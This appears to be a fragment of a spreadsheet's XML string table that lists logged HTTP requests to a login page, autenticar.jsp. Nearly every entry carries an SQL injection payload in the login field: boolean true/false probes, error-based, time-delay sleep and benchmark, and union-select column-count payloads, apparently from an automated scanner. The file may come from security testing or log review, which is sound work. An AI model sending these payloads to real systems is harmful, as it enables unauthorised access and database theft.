    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and625=4251&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and8929=8929&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and2049=6346&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and4758=4040&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and8929=8929&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and4891=5994&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and2487=6867&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and8929=8929&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and7343=9138&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and4295=863&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and8929=8929&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and1313=519&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and3615=8374and(5806=5806&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and8929=8929and(5264=5264&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0))and4756=9939and((954=954&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0))and8929=8929and((8066=8066&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)))and9125=9309and(((4265=4265&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)))and8929=8929and(((3957=3957&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0and193=1994&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0and8929=8929&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and7505=9842and('ignb'='ignb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and8929=8929and('sztp'='sztp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and3544=8652and(('ovwj'='ovwj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and8929=8929and(('snnm'='snnm&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and9426=8091and((('itgv'='itgv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and8929=8929and((('rkli'='rkli&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and1073=7993and'ujta'='ujta&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and8929=8929and'odfw'='odfw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and6237=127and('bdhe'like'bdhe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and8929=8929and('cnwu'like'cnwu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and3840=4647and(('grnt'like'grnt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and8929=8929and(('cxma'like'cxma&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and3663=6345and((('zttz'like'zttz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and8929=8929and((('iwnl'like'iwnl&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and6703=8644and'dmcq'like'dmcq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and8929=8929and'yzbn'like'yzbn&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and3165=9529and("rxel"="rxel&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and8929=8929and("fotw"="fotw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and4213=3363and(("sjdg"="sjdg&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and8929=8929and(("ypee"="ypee&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and82=808and((("zcvf"="zcvf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and8929=8929and((("yloo"="yloo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and2497=6458and"mjzn"="mjzn&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and8929=8929and"nalk"="nalk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and9498=6689and("rekz"like"rekz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and8929=8929and("fcga"like"fcga&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and189=8827and(("doxo"like"doxo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and8929=8929and(("essy"like"essy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and3570=6422and((("utwe"like"utwe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and8929=8929and((("ubbj"like"ubbj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and5231=3751and"ydpc"like"ydpc&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and8929=8929and"squw"like"squw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and6326=1922--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and2173=2173--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and2033=1593--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and2173=2173--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and289=5443--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and2173=2173--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and2209=6164--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and2173=2173--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and3014=1845--and(1766=1766&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)and2173=2173--and(4759=4759&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0))and8477=5935--and((4639=4639&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0))and2173=2173--and((6211=6211&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)))and3888=2367--and(((8555=8555&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)))and2173=2173--and(((6256=6256&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0and859=8011--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0and2173=2173--&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and5305=5485--and('njfi'='njfi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and2173=2173--and('zpou'='zpou&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and152=1488--and(('pynz'='pynz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and2173=2173--and(('fuml'='fuml&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and1589=6701--and((('lobk'='lobk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and2173=2173--and((('ibgw'='ibgw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and9639=78--and'vfxv'='vfxv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and2173=2173--and'rxku'='rxku&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and6263=8711--and('axhf'like'axhf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')and2173=2173--and('jwlz'like'jwlz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and7335=6513--and(('xajg'like'xajg&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'))and2173=2173--and(('zpho'like'zpho&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and6715=8393--and((('zahr'like'zahr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0')))and2173=2173--and((('eckq'like'eckq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and4251=2218--and'ldfy'like'ldfy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and2173=2173--and'cwqe'like'cwqe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and2801=7235--and("hxrv"="hxrv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and2173=2173--and("vkil"="vkil&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and292=1847--and(("pyyy"="pyyy&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and2173=2173--and(("ocze"="ocze&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and8136=3658--and((("qass"="qass&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and2173=2173--and((("khgr"="khgr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and1282=6818--and"nyok"="nyok&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and2173=2173--and"xdqi"="xdqi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and2550=5371--and("gkin"like"gkin&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")and2173=2173--and("kgkb"like"kgkb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and4099=4910--and(("xilk"like"xilk&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"))and2173=2173--and(("jtxv"like"jtxv&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and6841=8457--and((("jpgj"like"jpgj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0")))and2173=2173--and((("depm"like"depm&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and7142=5901--and"cpwe"like"cpwe&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0"and2173=2173--and"tynz"like"tynz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3147)ornot(6144=9152)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5023)ornot(6400=6400)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4580)ornot(7270=2084)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5879')ornot(4969=4726)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3043')ornot(6400=6400)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4074'ornot(1658=3463)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7802'ornot(6400=6400)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5235"ornot(7184=4126)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3409"ornot(6400=6400)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5293"ornot(2464=68)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8371)ornot(6537=9889)and(410=410&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5000)ornot(6400=6400)and(7515=7515&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4700)ornot(613=8699)and(9299=9299&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5573))ornot(1874=4606)and((692=692&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8055))ornot(6400=6400)and((7312=7312&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-262))ornot(2426=89)and((4705=4705&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-4956)))ornot(9218=1405)and(((9049=9049&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7048)))ornot(6400=6400)and(((1716=1716&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-9701)))ornot(3760=1366)and(((8848=8848&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-9045ornot(4954=4959)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3097ornot(6400=6400)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8129ornot(6156=7438)&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-2391')ornot(4219=8924)and('adxl'='adxl&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-6925')ornot(6400=6400)and('zlgh'='zlgh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5215'))ornot(9581=6840)and(('fqio'='fqio&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7252'))ornot(6400=6400)and(('cydf'='cydf&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-2130')))ornot(513=8749)and((('qzpj'='qzpj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5723')))ornot(6400=6400)and((('yewj'='yewj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8107'ornot(9120=1027)and'zqja'='zqja&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-5485'ornot(6400=6400)and'qurt'='qurt&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-8717'ornot(6644=7201)and'oyma'='oyma&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and(select5854from(selectcount(*),concat(char(58,116,105,106,58),(select(casewhen(5854=5854)then1else0end)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'qvug'='qvug&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'androw(6921,3961)&gt;(selectcount(*),concat(char(58,116,105,106,58),(select(casewhen(6921=6921)then1else0end)),char(58,106,97,101,58),floor(rand(0)*2))xfrom(select6921unionselect3961)agroupbyxlimit1)and'jfnh'='jfnh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-3277'or(select1994from(selectcount(*),concat(char(58,116,105,106,58),(select(casewhen(1994=1994)then1else0end)),char(58,106,97,101,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'biar'='biar&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0';selectsleep(5);--and'jqox'='jqox&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0';selectbenchmark(5000000,md5(char(106,117,97,87)));--and'lvmx'='lvmx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'andsleep(5)and'eqen'='eqen&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'andsleep(5)--and'wtca'='wtca&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and5950=benchmark(5000000,md5(char(102,75,73,120)))and'gmuu'='gmuu&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'and6447=benchmark(5000000,md5(char(113,83,78,121)))--and'tbae'='tbae&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=-7981'or5425=sleep(5)and'pplb'='pplb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull#and'lffm'='lffm&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null#and'wczr'='wczr&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null#and'dcwh'='dcwh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null#and'nylb'='nylb&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null#and'nvqx'='nvqx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null#and'fkdp'='fkdp&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null#and'qtuq'='qtuq&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null#and'tszz'='tszz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null#and'aspj'='aspj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselectnull,null,null,null,null,null,null,null,null,null#and'zdyz'='zdyz&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2489#and'wflx'='wflx&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect3710,3710#and'glbi'='glbi&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect831,831,831#and'uemj'='uemj&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4189,4189,4189,4189#and'ndaa'='ndaa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect949,949,949,949,949#and'qqfh'='qqfh&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect8770,8770,8770,8770,8770,8770#and'ygrl'='ygrl&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect4987,4987,4987,4987,4987,4987,4987#and'vxxo'='vxxo&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect5495,5495,5495,5495,5495,5495,5495,5495#and'pgda'='pgda&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect2711,2711,2711,2711,2711,2711,2711,2711,2711#and'qrqa'='qrqa&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0'unionallselect247,247,247,247,247,247,247,247,247,247#and'atbw'='atbw&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
